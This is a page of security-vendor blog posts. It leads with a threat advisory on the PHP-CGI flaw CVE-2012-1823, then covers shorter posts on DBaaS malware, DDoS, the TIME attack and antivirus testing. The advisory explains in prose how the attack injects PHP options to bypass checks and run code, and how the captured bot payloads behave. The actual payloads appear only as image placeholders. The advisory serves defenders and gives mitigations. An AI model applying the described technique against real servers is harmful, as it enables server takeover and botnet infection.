Blog|Login|中文Deutsche日本語
31 posts categorized "Amichai Shulman"
March 18, 2014
 Threat Advisory: PHP-CGI At Your Command
Pin It

For a long time, PHP has been the dominant server side framework for companies to write their web applications with. In fact, ~82% of all websites today are written in PHP. And while PHP’s power by numbers creates an appetite with security researchers to look for flaws leading to maturity, documentation, and security best practices– the numbers drive hackers to focus on it as well.

Php1

On October 2013, a public exploit in PHP was disclosed. The exploit uses a vulnerability found in May 2012 and was categorized as CVE-2012-1823. The exploit suggests that PHP, in conjunction with Apache, suffers from command injection vulnerability.

Soon after the exploit was released, Imperva honeypots detected web servers being attacked with this exploit in different flavors. In the three first weeks following the publication we were able to record as many as 30,000 attack campaigns using the exploit. As this was an interesting surge in attack activity, we decided to look deeper into the attack.

Later on, we picked up intelligence showing that different botnets have picked up the vulnerability per its effectiveness, and have also captured samples of bot clients that have embedded this vulnerability exploitation in them.

One of the interesting points is that despite the fact that this vulnerability is somewhat dated, cybercriminals are still using it, understanding that a major part of the install base of PHP does not update on a regular basis – thus creating the window of opportunity.

In this threat advisory, we will cover the following:

  • The technical background and analysis of the vulnerability and exploitation techniques
  • Samples of the attack vectors captured in the wild
  • Industrialized cybercrime aspects of this vulnerability
  • Mitigation techniques

 

A first look into the vulnerability

The vulnerability first appeared in the different vulnerability databases on 10-29-2013, and was identified with the CVE code 2012-1823. The exploitation code was soon available via different exploit websites

Php2

The vulnerability enables a remote attacker to execute arbitrary commands on a web server with PHP versions 5.4.x, 5.3.x before 5.4.2 or 5.3.12. These versions account for 16% of all public websites in the Internet.

Php3

 

The honeypot trail…

After having analyzed the attacks recorded by our honeypot, we learned few interesting facts:

  • The overall count of attackers (different source IP) was 324 while the overall count of targeted web server was 272. Most of the attacks originated from the US (35%), France (21%) and Germany (15%).

Php4

  • The most common URL used in the attacks was by far //cgi-bin/php (chart 1). Later on we will explain why the attack requires the exact location of the PHP CGI executable in order to succeed.

Php5

  • The biggest attacks in terms of volume were carried out in half a day or a day period.

Php6

  • The vast majority of the attackers (86 different attackers IPs) executed their attack in half a day or a one day period attacking a single target. As the attack period and the number of targets grew bigger, the number of attackers dropped significantly.

Php7

Technical Background and Analysis         

The vulnerability official (and somewhat confusing) description is: 

Php8

The simple, straightforward explanation is that an external attacker can set command line options for the PHP execution engine. Such command line options eventually allow the attacker to execute arbitrary PHP code on the server.

You might scratch your head and ask – haven’t we seen this before? The answer is YES! This vulnerability is not new and had previous public exploits published. 

Php9

In previous cases, the attack relied on the server configuration to redirect all PHP files to PHP CGI and thus making it vulnerable to code leakage, code execution and more. The new attack however, tries to access the PHP CGI directly and hence must use the exact location of the PHP CGI executable.

Before we move on, it is essential to understand what PHP CGI is and how it works. Common Gateway Interface (CGI) is a standard method used to generate dynamic content on web pages and web applications. PHP CGI means using the PHP interpreter through CGI mode. The web server will pass the data from the request to PHP (an external program); its input is a PHP file (usually on the server) and its output is HTML code (usually rendered in the client’s browser). PHP CGI configuration is set via PHP INI directives files.

The vulnerability allows remote attackers to place PHP command line options in the query string, including the “-d” option. This option defines PHP INI directive before running the PHPinterpreter. In this attack, the “-d” option is used to manipulate PHP security settings in order to bypass security checks and allow remote code execution.

Looking at sapi/cgi/cgi_main.c file from the vulnerable PHP code tree, we can find out which directives are used for the security checks:

Php10

The code indicates two PHP CGI settings - cgi.force_redirect and cgi.redirect_status_env

PHP configuration directive cgi.force_redirect prevents anyone from calling PHP directly with a URL. Since PHP turns this directive on by default, a direct access to PHP via http://example.com/cgi-bin/php will produce HTTP error code and the following error message

The PHP CGI cannot be accessed directly. This PHP CGI binary was compiled with force-cgi-redirect enabled.  This means that a page will only be served up if the REDIRECT_STATUS CGI variable is set, e.g. via an Apache Action directive.

Controlling cgi.force_redirectand cgi.redirect_status_env values enables the attacker to bypass PHP CGI security check.

Another crucial directive that is set using the “-d” option in the attack is auto_prepend_file. This directive specifies the name of a file that is automatically parsed before the main file; php://input isa read-only stream which in our case is the raw data from the request body.

By setting auto_prepend_file to php://input the payload of the attack (arbitrary PHP code) is introduced in the request body.

Attack vectors captured in the wild

Let’s take a look at an example attack vector that was captured in the wild

Php11

Which is translated to -

Php18

Not surprisingly, in the example attack vector above, the HTTP request body contained PHP code that downloaded and installed a botnet malware client –

Php12

Payloads analysis

We have managed to identify 43 different types of payload data in the attacks registered in our honeypot. The payloads appear to be botnet malware client constructed in the following pattern:

Php19

The PHP payload is designed to download a malware executable file from a remote server to an unsuspicious directory (/tmp, /dev/shm, /var/lock, /var/tmp), run it and hide it ever existed by removing it from the file system. The servers that host these files are usually legit, however compromised, servers and the file names are disguised as image files or text files.

The malware files are usually written in PHP, Python or C and vary from simple reverse shell backdoors, to IRC clients that connect to C&C servers. We also notice that some malwares have different functionality according to the kernel versions and the processor architecture of the infected server.

Php13

Php14

Our experience shows that this level of sophistication is linked with industrialized crime, also known as bot herding. The attackers in this case, scan for servers that are exposed to the vulnerability (using PHP CGI from vulnerable versions) to infect them with their bot clients, thus transforming them into zombies which receive commands from a C&C server under their control. These botnets are then sold or rented to the highest bidder.

A surprising fact is that even today, this vulnerability can be used successfully as companies don’t take the appropriate measures to secure their servers. Evidence to this fact can be found in active drop down sites that are still hosting the botnet clients, as shown in the following example:

Php15

 

Some of the botnets that we have been looking into are still active, some of them are relatively new and activity can be witnessed with commands being sent to their zombie servers that operate under their control.

 

It is a very intriguing point to show that cybercriminals understand the serious gap that exists between the time that a vulnerability is found in the wild, to the time it gets reported and patched (if third party software/framework is in the loop, such as PHP). Finally, there is a time lag until  a company becomes aware of both the issues and the fix – and implements it. This creates a window of opportunity for hackers to act on, as they know that the window will be open for a long time.

Php16

 

PHP Patch

PHP offers a patch (here) to mitigate the vulnerability. The code snippet below shows that PHP added a verification to ensure that the query string does not include command line options.

Php17

 

Mitigation Recommendations

  • Verify your PHP version is not vulnerable (i.e., PHP 5.3.12 and up, PHP 5.4.2 and up); if you still use a vulnerable PHP version, make sure it is patched
  • If it is possible, do not use PHP in CGI mode
  • Place your web application behind a web application security solution (such as a WAF) to protect it from web attacks such as this one

 

December 11, 2013
 HII: Assessing the threat landscape of DBaaS
Pin It

CloudOver past few years we’ve seen an ever-growing tide of data breaches with reports of new breaches coming out almost every day. Having said that, there are still very few published details on how actual data exfiltration happens. This is mainly due to the fact that organizations that have been breached are hesitant to share information other than what they are obligated to share by law.

As a result, while there is quite a lot of information on how endpoints become infected as well as on what the Command and Control (C&C) communication looks like (IP reputation, etc.), there is almost none on what the threat looks like from enterprise data center point of view. There are lots of discussions about the need to share information, and for a good reason. Unfortunately, these discussions have not necessarily translated into actual sharing.

Lack of insight greatly hampers the ability to develop effective security measures. Statistics are always open to interpretation, and because the security industry is left to reply on statistical analysis, security strategies are often left with a gaping hole.

To fill that void, we constantly conduct research to understand the properties of potential threats to data centers. Our latest Hacker Intelligence Initiative report, “Assessing the Threat Landscape of DBaaS” is the latest result of this research initiative.

What does DBaaS has to do with it?

Data centers are no longer confined to the enterprise perimeter. More and more enterprises take their data to the cloud, but forget to adjust their risk management practices when doing so. The recent MongoHQ breach is just one example of this type of oversight.

While we didn’t find malware that directly attacked a database, our research did find and analyze malware with a module able to connect to Microsoft MSSQL. Moreover, the research found that this malware was used to automatically connect to MSSQL cloud service for both C&C and data exfiltration purposes.

As an interesting side note, we also stumbled upon a cool sample after the writing of this report: malware that brought its own MySQL dll library to the infected machine. This fact correlates with our assessments of growing trends in data center security threats.

What’s in the Report?

The report shows how attackers took advantage of hosted database services in order to set up their own C&C and Drop servers. The servers lead us to some interesting insights about the advantages of using “malicious” hosted data-stores, and the risks they present to legitimate users. For example, enterprises need to re-asses the severity of database vulnerabilities in a hosted environment.

Analyzing the attackers data-store also revealed interesting points. For example, the targeting of business platforms. In conclusion, we predicted what we believe are growing trends in the data-store threat landscape.

Where can I learn more?

  1. Our Hackers Intelligence Initiative (HII) report, can be found here
  2. The Blog on the MongoHQ breach, here
  3. A Forbes article, looking into the DBaaS trend, here
  4. An Oracle user group research, covering what users are really doing with audit and security problems, here 

 

September 08, 2013
 PHP SuperGlobals: Supersized Trouble
Pin It
PhpIn our latest HII report, we dissect a problem that has been around for ages. The ADC research group has been studying the implications of third-party applications on the security posture of organizations. Attackers are always streamlining their activities and therefore aiming at commonly used third-party components that yield the best return on investment. With that in mind, we investigated one of the most commonly used web infrastructures: PHP.

The PHP platform is by far the most popular web application development platform, powering over 80% of all websites, including top sites such as Facebook, Baidu, and Wikipedia. As a result, PHP vulnerabilities deserve special attention. In fact, exploits against PHP applications can affect the general security and health status of the entire web, since compromised hosts can be used as botnet slaves for further attacks on other servers.

In the PHP architecture, several variables in the application are not explicitly defined in each script. These variables are called PHP SuperGlobals.

Ever since the PHP platform was introduced, the interaction between PHP SuperGlobals and user input has represented a security risk. Despite recommendations by application security experts, this interaction is still here today – probably due to the high flexibility it provides to programmers and due to the amount of legacy code written this way.

Two of the vulnerabilities mentioned in our report date back to 2010 and 2011. Unfortunately, they are still actively and successfully being used in combination with other legacy PHP security issues. That is exactly the problem! We should have gotten rid of the easy path from user input to SuperGlobals a long time ago.

Does this teach us something about patching known problems in the software development lifecycle as a security strategy? Does it imply that one should only trust a 3rd-party application layer security solution that tracks attacks in the wild? SQL injection is also old news. Does this have any effect on SQL injection still being the #1 threat to web applications? Some of these questions are mind blowing, and yet for many they remain unanswered.

Our research explores PHP vulnerabilities and the methods hackers use to exploit them in the wild. We also provide an analysis and specific recommendations on how organizations should prepare and deal with the long-standing security risks of PHP SuperGlobals.

To download the research paper, please click here.

 

August 19, 2013
 Our take on the NSA’s decision to cut back on sys admins
Pin It

NavalA couple of weeks ago, the NSA Director, General Alexander was quoted in a Reuters article saying that in order to limit data access and potential leakage, they will cut back on 90% of NSA system admin staff.

This statement drove lots of criticism, since it makes no sense to cut back on critical staff in a very disproportionate way, which makes us believe that there is something else there…

"At the end of the day it's about people and trust," Alexander said.

Maybe he should have phrased things a little differently: "At the end of the day it's about people and trust, plus monitoring the people you trust."

It seems like the real issue is not the number of people, but rather the number of people who hold administrative privileges. What you really need to cut is administrative privileges from 90% of the people.

Administrators should not be immune to scrutiny. In order to refrain from the next Snowden-like issue, segregation of control should be implemented, necessitating a collusion of at least two individuals of different teams to leak the data.

To do so, the security team should be supplied with a compensating monitoring system over files and database access which:

  • The administrator has no control of
  • Can only monitor access to the data rather than actually accessing the data(eliminating another potential backdoor)

”In God We Trust, All Others We Monitor”

 

May 09, 2013
 Why Hosters Should Care About Web Security
Pin It

4Earlier this week, the “Moroccan Ghosts” published a list of 52 defaced Israeli sites, replacing site
content with political propaganda pages (and some cool Moroccan music).

Looking into the hacked domain list, we noticed that most of the domains in the disclosed list are hosted on the same server. In this case, a large hosting company in Israel. It was relatively easy to see that the server itself runs PHP v5.

3

Although this is merely educated speculation, it seems that the hackers were able to exploit a configuration mistake in the server rather than individual vulnerabilities in the hosted applications or taking over the entire server through a vulnerability in a single application.In a shared hosting environment “one rotten apple spoils the barrel” – so a single vulnerability may result in owning the entire server and the database that holds data for all applications.

In other words, when an application is hosted on a shared hosting server, even if one application owned by company A is secured, if a second application owned by company B is not so secure and is being hacked, the end result may be a breach to both. This is also true to a secured application on an insecure platform.

What can hosters do to prevent incidents like this?

  • Proper server administration should enable creating silos in terms of database servers, virtual directories and permissions per customer. This reduces the risk in some ways but does not remove it.
  • Hosters should offer the same compartmentalization services they offer to physical customers, to the digital and hosted customers by adding web application controls that will reduce the risk of such hacks.
  • Make sure that the management platform is secure, since lots of the hoster hacks are breached via an insecure management console that allows file changes and DNS changes per user provisioning, or globally.
  • Offer web vulnerability scans to your customers, because most companies do not have the experience that hosters have dealing with web applications and the security required around them. It makes sense that customers that outsource hosting their applications will appreciate outsourcing the security around them. However, to complete the cycle scanning is not enough! Once vulnerabilities are found it is critical to use controls such as Web Application Firewalls to remediate the findings.

 

 

April 22, 2013
 Get What You Give: The Value of Shared Threat Intelligence
Pin It

The issue of sharing information for security purposes has become a hot discussion topic by both industry practitioners and legislators. The CISPA in the US and the CISP in the UK are examples of how regulators try to facilitate the cyber security information sharing by private sector actors. In fact cyber security information sharing is already applied for quite a long time to domains like malware identification spam mitigation and anti-phishing.

So far, however, cyber security information sharing has not been applied to what is probably one the most critical domains – web application attacks. Whatever sharing was going on was mostly of a “tell-tale” nature – organization sharing success (or failure) stories and vulnerability information made public (usually with a substantial delay).

The research we’ve conducted in our labs for the past year focused on cyber security information sharing for the web application layer domain. We tackled the issue from many different angles including: what is the minimal set of data that should be shared (and still makes sense), how can we measure the potential value of the sharing process and whether the information being shared can be automatically translated into structured actionable intelligence information that can be disseminated back to the community and deployed automatically in a timely fashion.

We covered attack data from over 50 applications in our research and the results are very favorable. While many details can be found in the reports I’d like to share a couple of examples here in the blog. First one is what we called “reputation quadrants” which shows the relevance of attack agents (attack source, attack vectors or attack tools) for the sharing process. In the reputation quadrant for RFI payloads for example (see below) we can see that one third of the attack payloads contribute 76% of attack traffic across the entire set of applications. 

1

This clearly shows that fast identification of some attack agents can have a meaningful contribution to all members of the community. Moreover, if we look at the progress chart (below) of one specific attack source (among many) that was identified as persistent SQL injection source across multiple applications, we can see a pattern at which the source is simultaneously attacking only a single target, however it persistently increases its effect on the community over time by hoping from one target to another.

2

All in all the contribution made by our work is twofold: quantify the real value of applying cyber security information sharing to the web application domain and promote the idea of automatically producing actionable intelligence from the data. You are all invited to view the full report on this Link.

 

March 27, 2013
 Lessons from the Spamhaus DDoS incident
Pin It

Ddos

Last week, as part of the Spammer-Anti-Spammer wars - An attack on Spamhaus was created using a DNS amplification attack on highly rated DNS servers, the attack used Botnets to send an initial reflection request to the DNS Servers, which then generated the actual traffic. Today, although we are not sure if the same vector of attack was used again, the attack was able to draw enough web traffic to Spamhaus to reach a reported peak of 300Gbps of DDoS – a respectable number indeed. It is clear that proper DNS Server monitoring and configuration should have deflected the attack at an early stage. The DNS Attack vector showed again the effectiveness of using servers as initial attack vectors rather than a user-based botnet.

Where can you learn more about DDoS?

  • Imperva White-Paper about the four steps to defeat a DDoS attack
  • HII report that analyzes different DDoS attack techniques, and how to deal with them
  • A short DDoS protection customer story that shows both attack and defense mechanisms

 

 

March 19, 2013
 A Perfect CRIME ? Only TIME Will Tell
Pin It

TimeSharing security research and intelligence makes the community as a whole safer. By uncovering and sharing information on weaknesses in the Internet, common vulnerabilities and new attack techniques, our customers and the industry learn specific ways to improve their risk posture and gain deeper insight into how cybercriminals operate.

Once upon a Time…

In 2012, a new attack against SSL named “CRIME” (Compression Ratio Info-leak Made Easy) was introduced.  The attack uses an inherent information leakage vulnerability resulting from the HTTP compression usage to defeat SSL’s encryption.

Despite the very interesting find, the CRIME attack suffered from two major practical drawbacks:

  1. The attack threat model: for a CRIME attack to work, the attacker must control the plaintext AND to be able to intercept the encrypted message. This attack model limits the attack to mostly MITM (Man in the Middle) situation, you must use eavesdropping.
  2. The CRIME attack was solely aimed at HTTP requests. However, most of the current web does not compress HTTP requests.

Last week at BlackHat 2013 in Amsterdam, Imperva’s Tal Be’ery, a Web Research Team Leader in the ADC Group, presented a new analysis of the CRIME attack, advising that the discovered cyber threat may be more serious than previously believed.

The analysis showed the potential for a new attack technique, which we’ve dubbed TIME (Timing Info-leak Made Easy), that could overcome the two limitations of the original CRIME attack, specifically removing the eavesdropping requirement and making the attack surface broader by focusing on HTTPS Response instead of HTTP request compression.

In Layman’s Terms

The TIME attack, which mainly affects Web Browsers, shows that all the hacker needs to do is redirect an innocent victim to the malicious web server, apply certain JavaScript and get the victim's secret data; the barrier of the eavesdropping requirement is removed.

Diving into the Research

First and foremost, SSL is NOT broken and your online bank accounts are pretty much as safe as they were before this research. Attackers will still try to get your data by infecting your machines with malware and attacking the server with SQL injection or other web application attacks to get the data within the database. Tal’s research focused on being one step ahead of the hackers - understanding how they could evolve the attack to make it easier and more effective – so that the security industry becomes aware of the potential problem.

The main focus areas of the research:

  • Show that the CRIME attack could be extended to HTTP responses – The original CRIME attack had shown that the interaction between compression and encryption may leak data. However, the attack was limited to discovering secret data on the HTTP request only, namely the cookie. Therefore it was easily mitigated by disabling the compression of cookie header. Tal showed that CRIME attack techniques can be extended to attack any secret data on the HTTP response.
  • The eavesdropping requirement of the CRIME attack is one of the main reasons that the attack vector was considered impractical, since it required the attacker to be located either on the same network or have some control already of the victim, which renders the vector ineffective. 

Key Takeaway

Using the extended TIME techniques, our research show that an attacker can infer on the data size from timing measurements taken by a JavaScript, allowing the attack to be carried out by a remote attacker, this elevates the severity of the attack vector for the first time as it removes the need for eavesdropping from the game. Second, the extension of the attack to HTTP Response grows the attack surface as most applications allow HTTP Response compression for performance reasons (unlike HTTP Request where compression is sometimes redundant) therefor making the vulnerable potential attack surface larger.

Where can I learn more ?

You are invited to download Tal’s BlackHat Presentation, Further information and relation to other research work could be found at ArsTechnica at This link.


 

February 21, 2013
 Introducing the WAF Testing Framework
Pin It

WtfLast week I attended an OWASP conference in Israel and participated in a panel about WAFEC. This panel is part of the currently ongoing effort to generate the second version of the WAF evaluation criteria standard. The panel gave me an opportunity to express my major concern about WAF evaluation today – the lack of measuring tools and in particular the continuous disregard towards measuring false positives.

I've already expressed these concerns in the last OWASP US conference where I presented a tool that might help the community overcome these issues.  The tool called WAF Testing Framework (WTF) is easily configurable with traffic samples that represent attacks (in a stateful manner) and good traffic. It then communicates according to this configuration with a bundled web application, assuming a WAF is installed in the way. The tool is able to measure the response of the WAF to each one of the requests and display a chart that includes information on False Negatives as well as False Positives.

We've decided to make this tool available to the community as open source. Initially it is available on our site Here. We will probably open an open source project for it on one of the standard repositories soon.

 

 

January 10, 2013
 Still Don't Like Our AV Study? A Response to The Critics
Pin It

Imperva CTO Amichai Shulman:

Let me start by saying that I’m not a big fan of back and forth argumentative discussions taking place in the blogosphere. However, the religious rage that erupted over the past couple of weeks with respect to our paper, Assessing the Effectiveness of Antivirus Solutions, compels me to provide some response.

Trying to avoid dragging the reader through a lengthy text full of complex arguments I’ll try to take this backwards (kind of the “Backwards Episode” from Seinfeld). The bottom line is in fact that many people have questioned the core aspects of our research: choice of malware samples and method of sample evaluation. However, even among those who have questioned our methodology, there seems to be a consensus around our conclusions – that standard AV solutions have reached the point of diminishing returns and organizations must shift their investments towards other solutions that protect organizations from the effects of infection. I have to assume that if our methodology leads us in a logical way to conclusions that are so widely acceptable, it can’t be all that wrong.

Criticism #1:  Sampling
The first part of the criticism targeted our choice of malware samples. Let me again put forward the bottom line – our critics basically claim that our results are so different than theirs because the method we used to collect the samples is incorrect. Let me put this in different words – if attackers choose malware the way AV vendors instruct them to, detection rates become blissful. If attackers choose malware in a different manner, you’re toast.

Poor sampling would be a fair argument to make if we used some mysterious technique for collecting malware that can only be applied by high end criminal gangs. That is, of course, not the case. We used Google searches with terms that get us close to sporadic malware repositories in publicly accessible web pages. We salted that with some links we obtained through sporadic searches in soft-core hacker forums.  We did focus on Russian language forums, but I do not believe that this is controversial.  Meanwhile, the “cream of the crop” was supplied by some links we took from traffic obtained through anonymous proxies. All this collection work was done by unbiased people, those who are NOT in the business of hacking nor employed by antivirus companies.

Moreover if we inspect the claim made by antivirus vendors with respect to what is the “right” set of malware samples, it actually supports our finding. They claim that if you take the sample size they are dealing with – 100K per day, they achieve higher than 90% detection (98% according to one report). That is – they miss 2,000 malware samples out of 100K. How hard do you think it is for an attacker (and I intentionally did not add the term “skilled”) to get his hands on a couple of those 2,000 undetected samples? I should add that all the samples that we included in our statistics—out of the samples that we’ve collected and tested—are those that were eventually detected by a large enough sample of AV products, and that none of them was a brand new malicious code – rather they were all variations and instances of existing malware.

Criticism #2:  Using VirusTotal
The second part of the criticism touches on our use of VirusTotal.com (VT) as a tool for conducting an experiment related to AV effectiveness. We recognize the limitations of using VT, and described those limitations in our paper.  However, bottom line first – we are not the first one to publish comparative studies of AV efficiency or to publish some analysis of AV efficiency based on VT. We drew explicit conclusions that are not put in technical terms but in plain business terms – organizations should start shifting their budgets to other solutions for the malware infection problem.

The first and foremost statement made by critics is “you should not have used VT because they say so." Again, here’s the bottom line – we have used VT in a prudent and polite way. We did not use undocumented features, we did not subvert APIs and we did not feed it with data with the purpose of subverting results of AV vendor decisions (which is an interesting experiment on its own). So basically, our wrongdoing with respect to VT is the way we interpreted the results and the conclusions we drew from them – going against this has no other term but “thought police”. This is of course before mentioning the fact that various recent reports and publications have been using VT for the same purpose (including Brian Krebs). I know that VT do not claim or pertain to be an anti-malware detection tool and that VT is not intended to be used as an AV replacement. However, they cannot claim to only be a collection tool for the AV industry with results provided per sample being completely meaningless. I must add that having an upload / get results API further disproves that claim. I deeply regret being dragged into this debate with VT since I truly value their role in the anti-malware community and have the utmost respect to their contribution to improvements of AV detection techniques and malware research.

One of the most adamant arguments against the validity of VT as a measurement for effectiveness is that it uses the command-line version of AV products and that configuration may not be ideal. I’d like to quote:

  • VirusTotal uses command-line versions: that also affects execution context, which may mean that a product fails to detect something it would detect in a more realistic context.
  • It uses the parameters that AV vendors indicate: if you think of this as a (pseudo)test, then consider that you’re testing vendor philosophy in terms of default configurations, not objective performance.
  • Some products are targeted for the gateway: gateway products are likely to be configured according to very different presumptions to those that govern desktop product configuration.
  • Some of the heuristic parameters employed are very sensitive, not to mention paranoid.

Regarding the first point, I personally do appreciate the potential difference between a command-line version of an AV tool and other deployed versions. However, in terms of signatures and reputation heuristics I don’t really get it. I’d love to see AV vendors explain that difference in details and in particular pointing out which types of malware are not detected by their command line version that are detected by their other version and why. I am certainly willing to accept that our results would have been somewhat different if tested an actually installed version of the product that is not the command-line version. However, I do think that they are a good approximation. If AV vendors claim that this is by far untrue I’d really like to see the figures. Is the command-line version 10%, 50% or 90% less effective than the product?

I don’t see the point in the second argument. Are they really claiming that VT configuration is not good because it is the recommended vendor configuration?

As for the third argument, this is really puzzling. According to this, we should have experienced a high ratio of false positives, rather than the high ratio of false negatives that we have observed in practice.

Quoting again:

VirusTotal is self-described as a TOOL, not a SOLUTION: it’s a highly collaborative enterprise, allowing the industry and users to help each other. As with any other tool (especially other public multi-scanner sites), it’s better suited to some contexts than others. It can be used for useful research or can be misused for purposes for which it was never intended, and the reader must have a minimum of knowledge and understanding to interpret the results correctly. With tools that are less impartial in origin, and/or less comprehensively documented, the risk of misunderstanding and misuse is even greater.

Again, the writer agrees that VT is indeed a tool that can be used for research as long as results are correctly interpreted. Yes, it is possible that we’ve misinterpreted the results. If that is your opinion then argue with our interpretation of the results. Unfortunately most critics chose not to do so, but rather argued that we used the wrong tools.

Epilogue
I could continue, however, I think that I’ve addressed the main criticism against our work and shown that most of it is of immaterial nature. I would like to see a livelier debate around our interpretation of the results and the conclusion – AV solutions attempting to prevent infection have reached a point of diminishing returns and are thus providing attackers with a large enough window of opportunity time-wise and device-wise to penetrate organizations and remain undetected for extremely long periods. It does not mean that we have to throw AV solutions away, it just means that we need to start shifting some of the money towards solutions that detect and prevent the effects of infection.

 

 

Find Us Online
RSS Feed - Subscribe Twitter Facebook iTunes LinkedIn YouTube
Authors
Monthly Archives
Email Subscription
Sign up here to receive our blog: